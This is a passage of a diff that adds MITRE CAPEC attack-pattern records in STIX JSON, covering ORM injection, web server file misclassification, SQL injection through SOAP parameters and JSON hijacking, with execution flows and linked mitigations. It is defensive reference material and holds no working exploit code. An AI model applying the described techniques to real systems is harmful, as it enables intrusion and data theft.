"2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", + "id": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).", + "id": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74092c9d-86c1-49c6-82cc-08e4da29ea92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", + "external_references": [ + { + "external_id": "CAPEC-109", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/109.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-564", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/564.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-4", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection" + } + ], + "id": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Object Relational Mapping Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Persistence Framework Used: An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.

    2. Techniques
    An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.

  2. Probe for ORM Injection vulnerabilities: The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.

Exploit

  1. Perform SQL Injection through the generated data access layer: An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.

    2. Techniques
    An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An application uses data access layer generated by an ORM tool or framework", + "An application uses user supplied data in queries executed against the database", + "The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44a7c013-8531-4a05-b8fc-d49a59a09123", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "spec_version": "2.1", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", + "id": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d021b9f3-7bd8-4d7c-8e30-933d2cff35f6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.", + "external_references": [ + { + "external_id": "CAPEC-11", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/11.html" + }, + { + "external_id": "CWE-430", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/430.html" + }, + { + "description": "Masquerading: Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204), SecurityFocus", + "external_id": "REF-6", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/bid/17204/info" + } + ], + "id": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cause Web Server Misclassification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [REF-6]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Footprint file input vectors: Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.

    2. Techniques
    Attacker manually crawls application to identify file inputs
    Attacker uses an automated tool to crawl application identify file inputs
    Attacker manually assesses strength of access control protecting native application files from user control
    Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests

Experiment

  1. File misclassification shotgunning: An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.

    2. Techniques
    Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
    Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.

  2. File misclassification sniping: Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.

    3. Techniques
    Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
    Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.

Exploit

  1. Disclose information: The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).

    2. Techniques
    Manipulate the file names that are explicitly sent to the server.
    Manipulate the MIME sent in order to confuse the web server.
", + "x_capec_extended_description": "\n This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Web server software must rely on file name or file extension for processing.", + "The attacker must be able to make HTTP requests to the web server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To modify file name or file extension", + "Medium": "To use misclassification to force the Web server to disclose configuration information, source, or binary data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", + "id": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-11-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22b26b12-1eff-40ab-95ab-8de26f22b487", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "spec_version": "2.1", + "target_ref": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", + "external_references": [ + { + "external_id": "CAPEC-110", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/110.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "SQL Injection through SOAP Parameter Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Incorrect SOAP Parameter Handling: The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.

    2. Techniques
    The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.

Experiment

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.

Exploit

  1. Inject SQL via SOAP Parameters: The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.

    2. Techniques
    An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SOAP messages are used as a communication mechanism in the system", + "SOAP parameters are not properly validated at the service provider", + "The service provider does not properly utilize parameter binding when building SQL queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "If the attacker has to perform Blind SQL Injection", + "Medium": "If the attacker is able to gain good understanding of the system's database schema" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate and sanitize/reject user input at the service provider.", + "id": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3a9b355-487c-4cfd-904c-055007648f78", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", + "id": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecba2a2e-f73d-4937-9f4e-d8650932e41a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.", + "id": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0ab5963-a4b2-4dab-aeee-924ec742c54a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.", + "external_references": [ + { + "external_id": "CAPEC-111", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/111.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + } + ], + "id": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "JSON Hijacking (aka JavaScript Hijacking)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand How to Request JSON Responses from the Target System: An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.

    2. Techniques
    An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.

Experiment

  1. [Craft a malicious website]The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:\n \n 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).\n 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.\n \n This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.\n

Exploit

  1. Launch JSON hijack: An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.

    2. Techniques
    An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers' malicious code executing in the victim's browser.
", + "x_capec_extended_description": "\n An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.\n There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "JSON is used as a transport mechanism between the client and the server", + "The target server cannot differentiate real requests from forged requests", + "The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", + "id": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ac6c9-0bf4-4b2b-80c8-407013b2e9fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user 